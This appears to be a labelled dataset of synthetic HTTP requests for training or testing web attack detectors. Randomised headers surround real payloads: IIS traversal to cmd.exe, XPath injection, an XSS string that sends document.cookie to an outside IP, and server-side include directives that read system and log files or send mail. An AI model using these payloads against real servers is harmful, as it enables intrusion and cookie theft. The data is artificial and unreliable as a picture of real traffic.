Cookie: n9rpi=gMD0f;eSomcdeaie=1631399083;CRX_l=wD1deu6sn
Cookie2: $Version="737"
Date: Sun, 12 Nov 06 12:11:10 GMT
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Fri, 01 Jun 07 03:18:48 GMT
If-Match: *
If-None-Match: "dIr2jl7MssNkq5hgxF"
If-Range: Wed, 06 Dec 06 14:06:12 CET
Max-Forwards: 38
MIME-Version: 0.0
Pragma: Utne='qoowHten'
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Basic c3Nlc29mOm1ob3R5dGJw
Referer: http://dnr6.net/5hrlDv/pfm4/idc2/rnss.swf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.2 (compatible; bstimxt3oL; Solaris; a5lr; ggededh0w; esoNce)
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Pixels: 4720x346
Via: HTTP/7.5 www.i4tgin.shtml:59, 5.8 230.89.99.224:8341, HTTP/3.1 222.23.88.52
Transfer-Encoding: sseJ7; icrrsiiu=Ro7eGOe
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 727 www.etqrZ.png "o18tm" 
X-Forwarded-For: 32.163.55.249
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42615
Start - Id: 44274
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Naslc.cz
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: nhrme-bg8
Cache-Control: no-store
Client-ip: 208.204.2.15
Cookie: uLpoygenej=703;shhnptnx=72;xsL8m5tqstw=ieutdn4ideaFcbb;6oNHcmd=117
Cookie2: $Version="500"
Date: Fri, 24 Oct 08 04:26:59 CET
ETag: "RlEOHw4WT-OI.q1H"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Wed, 27 Feb 08 06:28:43 CET
If-Match: *
If-None-Match: "F6tOg9hoGZGSklci"
If-Range: "QwmlmmG7j.GuYQ4NBEc8"
Max-Forwards: 3480
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: ut2ox dtgbj=visno
Range: 1630-9,-816
Referer: http://Im7tsq.st/oizin.tiff
TE: gzip,chunked;q=0.9
Trailer: User-Agent
User-Agent: iK0KyqvgH http://www.25oh2l3s.fr
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7064x6561
Via: 8.0 www.TqeeNe.png:11951, 5.7 214.65.44.25, onb6cS/6.0 246.6.151.181
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44274
Start - Id: 43935
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.Ollil.com:80
Connection: close
Accept: application/*, image/gif, image/*;q=0.7
Accept-Charset: utf-8;q=0.6, x-mac-greek, iso-8859-1;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: iiAehra7='oe'
Client-ip: 203.44.173.36
Cookie: rkauwhsd=9449;havingNhavingt7TI3Blink_T=ueX-@Nvd1;PE55@_VrH=maam0hsojgawrs;unIo7hm5=eeehwhhHmso;Fprst=a%9;tjuiEopaHicngnr=s657IzisJ
Cookie2: $Version="4"
Date: Fri, 30 Jan 09 19:01:16 UTC
ETag: "FKkc6IzcbEuCntMpiq"
Expect: 100-continue
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Mon, 16 Nov 09 09:40:27 UTC
If-Unmodified-Since: Mon, 22 Oct 07 12:00:02 CET
If-Match: "@ttS3Ol8Y1fYbYq0ON"
If-None-Match: *
If-Range: Wed, 28 Apr 10 16:15:48 GMT
Max-Forwards: 6583
MIME-Version: 3.4
Pragma: l=t
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: ohlp koeeoec=6ohc
Range: 080946-24031
Referer: http://HnpcM.uk/tashsjd.zip
TE: deflate;q=0.4,trailers,deflate
Trailer: If-None-Match
User-Agent: ozemA5 http://www.aoghP.org
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 8.1 www.ROtu.gif
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 211 224.102.234.193 "od6eSacvssthsio9cecV" "Sun, 12 Jun 05 22:02:50 CET"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43935
Start - Id: 49478
class: XPathInjection
GET /Zuz-eqdocumentL7E5MgK/feTKRupdate17UXNgwc./j8@x/nnByVcOXDQqp7Z3JWhm/reoGl7ewgxnUcwaayrt/dW3-iyEIVLy0O/sDacqy3iA.IdGH.cgi?oe=n%7El&ons4hild=0+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++14007%3D&hw8a=fdnwget%7Cpj%3Aoh6l8e&boeitjsdddec=mhNQnwZr7&arWdott=ceg%7Emdiveycetg1Tvbscripti%7E&gn2r=+2Ienwoeor&A4eit=adsoPuno HTTP/1.0
Host: www.7eegrhu.de
Connection: close
Accept: audio/*, text/*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: eh-tch, S-n0r;q=0.4, sehk-Ai5
Cache-Control: max-stale
Client-ip: 79.176.207.17
Cookie: 0xe=rlrtv Mf3i5
Cookie2: $Version="297"
Date: Sun, 05 Nov 06 24:47:24 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: rtiy1Ee@tsacta5ta.net
If-Modified-Since: Sun, 05 Dec 04 01:05:08 GMT
If-Unmodified-Since: Fri, 29 Apr 05 04:52:27 CET
If-Match: "_CD6R3wku-0wHkupP@M"
If-None-Match: *
If-Range: Wed, 26 Jan 05 11:30:08 GMT
Max-Forwards: 992
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic aXR1cTpoZHNyNw==
Authorization: ed4p ewtc5lar=tiKyS
Range: -012
Referer: /ps99.tiff
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (X11; U; Linux i586 5.5; ta-6r; rv:2.2.7) Gecko/13341391
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/0.6 178.82.201.110, FTP/7.8 www.itrsbcps.tiff
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49478
Start - Id: 45220
class: PathTransversal
GET /./? HTTP/1.1
Host: www.eosO.biz
Connection: keep-alive
Accept: image/*;q=0.0, audio/basic;q=0.3, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: m-ETa7or;q=0.8, dhsstld5-inrxohe;q=0.5, enta-ndudi;q=0.2, dYgse-atituia;q=0.7
Cache-Control: max-age=48295
Client-ip: 22.54.242.219
Cookie: assent=to;Gsreret=0333999;nmp=[e;wes=85335;dnn=si h;u1zry2xetn=iuofi
Cookie2: $Version="174"
Date: Tue, 06 May 08 18:13:03 CET
ETag: "Fye-r9dja0fSKIbx"
Expect: 100-continue
From: 1p4rry@estl2a.org
If-Modified-Since: Fri, 14 Mar 08 23:11:35 UTC
If-Unmodified-Since: Sat, 29 Nov 08 14:37:13 UTC
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "DGu6J8oAgQ73WlXb_C"
If-Range: *
Max-Forwards: 26
MIME-Version: 3.6
Pragma: lx='enaSr'
Proxy-Authorization: Digest qop=evai40
Authorization: Digest opaque="7nhte"
Range: -01750,762-,10389-0
Referer: /rE1r/eawd/rtee.jpeg
TE: trailers,gzip
Trailer: Expect
User-Agent: dhhZ9/8.6.7.3
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2272x045
Via: 2.3 www.e37ie6n.jpeg
Transfer-Encoding: agt2
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 50.104.249.90
X-Serial-Number: 706890452941318
----: --------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45220
Start - Id: 48775
class: XPathInjection
GET /0emz9en1rw/x6HZG/luN1a5shlnitnnRrElw/c6YjoBqvMb-P/th8lrWqxGHW6qmnptWeH/dUfzLWqB@a5copyMWa/mYgNZQnHWjdLYLJwegWH/onhlnRoI.gif?neeqamzh=nIo%26&ArPeh=u7k&mnp=3510094722&Oigichrsahdn=+no+hetw4&senAeraevfhheh=a1gcdVSoZ5&ewIrdiponi=ie4iaeeez&Wtnoi=%26+&teast9nzs6=ppoiaeecnhlndce&nonDmw=tzsnl%2Fni%2Fsi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+++++or++%27al%27++%3D++++%27&2bu3tese5eog=88930267 HTTP/1.1
Host: 125.216.82.82:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-cyrillic;q=0.9, iso-8859-6;q=0.8, iso-8859-9
Accept-Encoding: 
Accept-Language: at-occa, bt-7t2ohi;q=0.1
Cache-Control: max-stale
Client-ip: 132.71.74.85
Cookie: A4OV=7247198;tuOei7socEq8p=e;bUdIoG=zhehymamC)dj;ro=eaccess_loghtpasst5pisystemslinkgcyg6o;EHusehtiiinhtei=929;botitdsfri=95
Cookie2: $Version="67"
Date: Mon, 05 May 08 08:28:40 UTC
ETag: "XaSF7ffVYiharLa0lA"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Wed, 19 Sep 07 20:36:50 CET
If-Unmodified-Since: Mon, 09 Oct 06 21:22:53 GMT
If-Match: *
If-None-Match: "NXcWJm3vnSdIGNZ8"
If-Range: Wed, 21 Feb 07 22:57:55 UTC
Max-Forwards: 4378
MIME-Version: 6.1
Pragma: 00='do9v'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Digest nc=9C92a5FC
Range: -333764,-7
Referer: http://www.teNecS.org/rSe6bn/tnqAejp/rfenesnd.pl
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 4.0; qh-tZ; rv:2.7.1) Gecko/43400156
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0640x829
Via: 1.6 www.tatea.html:26111
Transfer-Encoding: eokhc; dyEst=b0uq4
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 178 131.107.128.102 "ir74fettml" "Sat, 10 Jul 04 12:45:47 GMT"
X-Forwarded-For: 160.70.37.175
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48775
Start - Id: 47311
class: XSS
GET /JddDii30iSm/4Npj/oh0ek4du.mdb?ihsloia=ircbErhqrh49rru3&amdTbeAoK=%3Cimg+src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F212.28.124.23%2Fng.asmx%27%2Bdocument.cookie%29%3B%5D%7D%3B+%3E&fnrthrdiyh=drB7h&juedoshioan1h=las&nu3es=2809957445&8retowhsI2raa=bpoefNl&RiiceIat=7&snEoaRi=s&uxopdepr=841067683 HTTP/1.1
Host: 116.143.16.232:3614
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 107.154.88.110
Cookie: Sst=fsgJnnad&erMbp;xeeomd=ujrEmpbt;tsecnfhrr=o@ira;cmd7jKJVZ9TO=iy'vbscripthtpassrvobject>FR smtawc
Cookie2: $Version="659"
Date: Fri, 04 Dec 09 20:53:55 UTC
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: 100-continue
From: 7enano@rnreTe6ep.de
If-Modified-Since: Sat, 16 Apr 05 02:15:00 UTC
If-Unmodified-Since: Tue, 07 Jul 09 16:28:04 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 505
MIME-Version: 0.1
Pragma: nN=9da
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest realm
Range: 498-
Referer: /atbkgiz/seHitiec/oaaeudro.nsf
TE: gzip;q=0.0,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: besnoNEe (h1Fnqq)
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/8.4 232.168.110.151, 7.2 www.reean3ty.jpeg
Transfer-Encoding: lgxk
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 126620
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47311
Start - Id: 39840
class: SSI
PUT /y9TWWI-C.LUm33p/eVx_L@uji3bMPbYdqR/hinvuph/igI.QPMEs9Zq_V/8UiQZlVW/o3treeyN7NeDywl.htm? HTTP/1.1
Content-Length: 265
Content-Language: c5kirtc
Content-Encoding: compress
Content-Location: http://www.esnaho.org/tdyauO/kdignt.js
Content-Type: application/x-www-form-urlencoded
Host: 135.65.148.78:00376
Connection: close
Accept: */*
Accept-Encoding: 
Accept-Language: *;q=0.3
From: IxNddnw@esbte.net
If-Modified-Since: Fri, 23 Jun 06 18:45:41 GMT
If-Unmodified-Since: Thu, 02 Mar 06 19:11:51 CET
Max-Forwards: 892
Range: -05
Referer: /g4tcst/leasgsts/awho/danthhm3.txt
TE: gzip,trailers
User-Agent: <!--#include   virtual="/var/log/httpd/access.log"  -->
X-Serial-Number: 39752722900840058

2a3g=group bytEi&nahtiiAodlenE=-esi+&nnsOroJ=ps7odA ehein&rlvopAl4tt=aa]&tzfindao=3nehbtsA2e Om& &o6rEbz6=DidN4Egi%Cv&lwepDbsQet6n=rtvx&aenmspyNRe2fn=64&lz=1160770&awrlksR5esea1db=1&cendeu=xVL24ZNd&rnetnf=fsi3toroa&brt=csagltY&jY9a-tI=efll o-|ps;ieyjje 

End - Id: 39840
Start - Id: 45035
class: PathTransversal
PUT /HXC/PeTcbodyHsock_streamYD8wHshutdowniQ/s-AX.Tz/USvQDHNQm/ayktuEar3smale/sqO/34ohdgnlyrhhwre2ea/Goo04orpEiodipu6ce/niXFVJ30.exe? HTTP/1.0
Content-Length: 273
Content-Language: 0tgeol,Edi
Content-Encoding: identity
Content-Location: /muo47t/wuwtjHga/enAl15qa/sr0noZ.jpg
Content-MD5: b3dkbzBlZWxoY3AwdEY1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Aug 07 11:32:31 CET
Last-Modified: Wed, 06 Dec 06 05:33:31 GMT
Host: www.zehenem.biz:006
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, deflate, compress;q=0.5, deflate, deflate;q=0.6
Accept-Language: *;q=0.2
Cache-Control: ban='ocn'
Client-ip: 87.7.212.138
Cookie: p6=8468926;oRiercnli=55617;irhRhngeqne2eae=grn6letmpNe;txs2e2rbtdPOheD=\1nl ki ewz t l;T9bWy0=./.././../;gDoJjqYiallm=o6u1r9Bmg37l
Cookie2: $Version="16"
Date: Thu, 02 Dec 04 14:12:36 UTC
ETag: ".zcPt1oJM8GXcvho2U"
Expect: zt0h
From: ordn@eEaog7iN6d.st
If-Modified-Since: Fri, 03 Sep 04 04:57:51 CET
If-Unmodified-Since: Fri, 21 Jul 06 11:36:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 7.0
Pragma: pklf=p2ef
Proxy-Authorization: ecHsir 6yeb=4hnaahtA
Authorization: Digest response="4ebDc8Fe71ad5bAf7Cc1FB32782588b6"
Referer: /7AnasC.swf
TE: trailers,trailers,deflate
User-Agent: EuaoalKlra
UA-Color: color16
UA-Pixels: 6325x2725
Via: 4.4 www.anns.js, Ee4t/3.2 www.e7s9efcn.htm, HTTP/6.7 www.tnqd.gif
Transfer-Encoding: deflate
Upgrade: ado/3.2, itnor/6.3
Warning: 517 www.n1bOS.jpg "aaleosr" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

daot=0i7XKvx-&gaeh2haou=ohtNerhtoTetord&n8oyirnnsatsaRr=osiuxeeaFesoe6&CuJNK=605926&nieiakiLdcoi=8mt5&pehnd=82&Ii=DausOi0aeAe=|lM&secl15Mnatlhnc=qtr|recoda|w&Z5Lvr5nxgBw4=b+i&vnEetraa=aushltDIenizE&bnthoolxbgy4=8621827058&tqhzslTcecoufot=7476&nnapahlz=nkrEipAlenh

End - Id: 45035
Start - Id: 40421
class: SSI
POST /d7c2fZ/c5yx_TROB5KN7ey/l81X@PF/JallBvU@.systemhelQ1lN/aeZdeleteSSVz33/3twwff0moerunineaeri/eyusNpux5qb9Rgn/afegng5irhiadnmge/uqzhRnNtnNa/yEUebcnjmZ_c9mZ.php? HTTP/1.0
Content-Length: 191
Content-Language: zaNpo,tdI,b
Content-Encoding: compress
Content-Location: /5kgye/ytugbex/hsnu/nioen/lmvs.dll
Content-MD5: QXJqckxpbGVsZWg5YXJoYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 05:03:36 GMT
Last-Modified: Mon, 16 Feb 04 23:56:29 GMT
Host: 226.202.58.12
Connection: p8apues
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: rsHreSai-szssvt;q=0.6, aeni-npteA;q=0.7, ob3eoaI-hwuhadne, yntrhsim-ht;q=0.5, ri-euouaa5e;q=0.5
Cache-Control: min-fresh=102
Client-ip: 41.5.190.224
Cookie: w7qNDlach4=e9mhst;ssdfDvhnei=vbscriptahnPutsmt]0dos
Cookie2: $Version="70"
Date: Sun, 27 Feb 05 02:59:25 GMT
ETag: W/"yUqutrDS@dr3nWVh3x"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Mon, 20 Mar 06 22:33:06 CET
If-Unmodified-Since: Wed, 27 Oct 04 01:38:36 GMT
If-Match: "MZS7axyKfcMF7l_CPa"
If-None-Match: *
If-Range: *
Max-Forwards: 637
MIME-Version: 6.8
Pragma: nn9=t6rl0reu
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic cnlpbTM6bmlycmVF
Range: 11-84,2848-,953675-
Referer: http://www.ysjqtg.be/ebgxto/Rmjhetr/tefade.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: e6RUn9 http://www.aich.net
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 808x844
Via: 0.3 158.158.244.222
Transfer-Encoding: gzip
Upgrade: ufb/8.5, d45i3/7.9
Warning: 538 222.86.10.146 "Etlso9Shinasieza" "Sun, 13 Jul 08 18:44:23 CET"
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qs6t9psrdoer=<!--  #include virtual="c:\winnt\system.ini"     -->&et=yi&oiEorttoed=103&nisatsnqspsro=emueQly0zepSa9ga&re3ahrutde5igna=dt0&Aooaalxtrpx9laj=nm)]n&l1=7625

End - Id: 40421
Start - Id: 39173
class: SSI
PUT /Rui5t1sirsew.nsf? HTTP/1.1
Content-Length: 505
Content-Language: tsww7o
Content-Encoding: identity
Content-Location: http://nzNkt.uk/ko6ru/lrtt/etztC/Ettio/bsouand.html
Content-MD5: M2VJYTlzNXRvdWU2aWRzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Nov 08 12:51:52 UTC
Last-Modified: Thu, 20 May 04 23:21:11 UTC
Host: www.1aeauuet.ch:978
Connection: close
Accept: application/x-tar, image/*;q=0.8
Accept-Charset: windows-874;q=0.5, euc-kr, euc-cn;q=0.2, cp-936
Accept-Encoding: 
Accept-Language: i3Rnp-00fnonas;q=0.9, hn-toE0epi
Cache-Control: no-transform
Client-ip: 105.29.124.80
Cookie: APRYGreplaceV6udvL=alrgmocemuwmy3l;5c3HT=8;osdrocm7rserls=7th>drop;Vf==hwe
Date: Sun, 13 Feb 05 09:01:19 GMT
Expect: s2C5
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Thu, 18 May 06 12:30:58 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 779
MIME-Version: 3.6
Pragma: Orai='diiu2mDt'
Authorization: NTLM NG9vZW5FcGEzOGVudXpZb0tjdGV4bW10ZGJhZWloMXdmZWdMU2VjOXRi
Referer: http://www.aiZknr.be/yhnf.doc
Trailer: Trailer
User-Agent: t7asds00tyel9
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: deflate
Upgrade: pnoi/6.7, ita3m/3.5
~~~~~: ~~~~~~~~~~

yfrvE=55yEdlyyZ3&Aee=915696&wi=h3boTi&tgenur=1ldtmpe8nJoait&CdinsertdOYMA9=<!--#email fromhost="www.tOlrG2.com" tohost="mailbox.8l2we.com" message="qe0So9 eeettzi earte esa" fromaddress="ipsest.com" toaddress="Qsct.1n3F.com" subject="dqp" sender="nyl4.com" replyto="ltnyT9t.com" cc="cd" inreplyto="Tn 3aO osb" id="Ehhfzmail" -->&atnhbd6anHsar=alpyAi&WeuOFfa=oco6&havingF6H=snuecn&3aocgyS=0lEtten&9gRqhooeimhleE4=zax58eil)&ye=eeep

End - Id: 39173
Start - Id: 40414
class: SSI
PUT /onni05siyhsf/shznAcRqleelh/Cdobi/ambhib/ofZ4NuwdgG1osGn/tratshtEar5o6f.php4? HTTP/1.0
Content-Length: 286
Content-Language: 72,hLlemm
Content-Encoding: compress
Content-Location: /ire7b3j/keln8i/d4j4.msf
Content-MD5: aGdobm9vRW9ydHpjSnN4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Dec 04 03:56:11 GMT
Last-Modified: Thu, 08 Jul 04 09:52:59 UTC
Host: 79.207.191.224
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, deflate;q=0.8, deflate
Accept-Language: *
Cache-Control: max-stale=49462
Client-ip: 21.209.58.212
Cookie: nmmstis=drbgeeda oas;blete=83;tt=tdcymedRtaLeZqt;1eet=n3HvV;rordmrl6n7reqea=wed4alll;tnxAsNareie=eeo~C
Cookie2: $Version="051"
Date: Fri, 22 May 09 12:28:50 CET
ETag: W/"KZOG9sh@1sguTXp"
Expect: MyiKiu
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 12 Jan 06 15:30:47 CET
If-Unmodified-Since: Sat, 25 Nov 06 05:35:55 UTC
If-Match: *
If-None-Match: "pHlSoQiWcRBXr@k_NI"
If-Range: Thu, 04 Jun 09 22:58:57 CET
Max-Forwards: 8
MIME-Version: 6.8
Pragma: cTo='enh'
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic ekRpYTpuaGNwY3J4cw==
Range: 835-90
Referer: /oiaipoc.nsf
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: ab9Njrat (s3ZPylxw; eb2ZvF6k8I; nnwDn.eus5; h8KU41kZwJ; ecgsiCHAXg)
UA-CPU: 68000
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5480x145
Via: HTTP/7.9 www.aigatded.png
Transfer-Encoding: deflate
Upgrade: ufb/8.5, d45i3/7.9
Warning: 717 108.5.228.232 "euhD8Tr" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~

loAAalr3wtrtE=QunSaf5(e&HlT_=593988568&tat=1593438&oe=6281&nGontonaitwEws=ro6sPH3zc&t8jawemgen=ttyn3ahuo&-FuJxp_oRtdO0dq=netwi&ldiolv=laos%s/a&Nr=eAmtqjlsesto&9ec4it=8178701&Aghun9are=<!--  #include  virtual="d:\windows\autoexec.bat"     -->&eBienP2NeheE=\7O

End - Id: 40414
Start - Id: 49842
class: XPathInjection
GET /daApel/heidyamp/esh_Pl/l.WFgSag0/mageoPie/bR33GokQgy-meC/enh/2Xt8DHM/sifemnnptdD2lisdpcte/0GC.exe?hettHci8Hn=cerxhn&oedemtel=aa-te%40remeO%3Adal&2sm1e6rs=esn%3Cinput0dfn%7Eftpmochay0&lEwoIewbsnimi6l=nb&N1msE=4xeeerhalc8&aHv1jx=wtn&enstlh=%24+nhoedjn&sdf1a9tesxilg=0091328201&Ae0r4ua=ruslibma+hhEEQm&otgdsoNtspyse=57705322&ihld=hse8&rehQ9oleyp=nd+n&ebit=35600&h3n=l3&arhiQwzoh2bzgtr=eadi%2Fetc%2Fisda1%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D+++or++++%27gmU%27++++%3D%27 HTTP/1.0
Host: www.pSkAihlse.org
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.4, koi8-r, euc-jp, iso-8859-9, ks_c_5601-1987;q=0.5
Accept-Encoding: gzip;q=0.4, gzip, identity, identity
Accept-Language: *;q=0.7
Cache-Control: min-fresh=53050
Client-ip: 146.101.131.153
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Sat, 05 Aug 06 15:19:13 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: ackeIlr=n1aE
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Thu, 21 Jul 05 01:11:55 CET
If-Unmodified-Since: Thu, 12 Jan 06 16:12:41 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "HFh47depKuS2t_Rfa"
If-Range: Wed, 08 Nov 06 06:35:22 CET
Max-Forwards: 70
MIME-Version: 4.3
Pragma: 9pati='nIxfdeew'
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest cnonce="cmnoh"
Range: 376648-,445-
Referer: http://www.mtr5gol.biz/2ihi/rwtre/aego7xor.cfm
TE: chunked,trailers
Trailer: Accept
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 3.3; bm-ra; rv:4.5.0) Gecko/25962226
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: 7.4 www.emxdo9.html, 0.2 102.24.240.116, ftoh/6.0 www.eodiin.css:8449
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 331 www.AWev.htm "atqetujtaOta9Meosn" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 6075380404911977
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49842
Start - Id: 49468
class: XPathInjection
GET /ePBPSwbfavu/nv@@4t3UZpru3Q/ty6Neehrhajt/-uTCUyD/vtcpc/r1IL/oBXv8szOKww5orM/iz99jCS_jjiGxZdwPt.swf?e3cR=ie8aXpBD&epntsrhvguNmjo=550877002&ai=61432&os8itpalI=m%3D&waoli=8819171&mhjysed3e=ciaflut&2rnyoumxe=nrr%2FAroaii%2Fee%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D++or++++%27dh%27%3D%27&ae=sXdsp&O3thesaeslt=oo&Taefswbttle=86813063&h9=sl-1f%2Fktiel%25+l+Es&fxDhawo3l4tanml=6&OqUk=gee&5tuaEtyikqLoCe=832&auect=y9cIrttcxuas HTTP/1.1
Host: 156.112.9.95:91626
Connection: keep-alive
Accept: audio/basic;q=0.3, audio/basic, text/*
Accept-Charset: windows-1251;q=0.5, euc-kr;q=0.0, windows-1254, iso-8859-6
Accept-Encoding: deflate;q=0.3
Accept-Language: eeaesn-toN, Hs-drns, exZsed-aS
Cache-Control: no-cache
Client-ip: 200.92.12.13
Cookie: eJissn=3508248;bwtui=Gph
Cookie2: $Version="182"
Date: Sat, 03 Dec 05 16:40:14 GMT
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 5renn=tz0whpeo
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Tue, 01 Jun 04 20:43:53 CET
If-Match: "Vq.pdotPDjOCd6M_dda"
If-None-Match: *
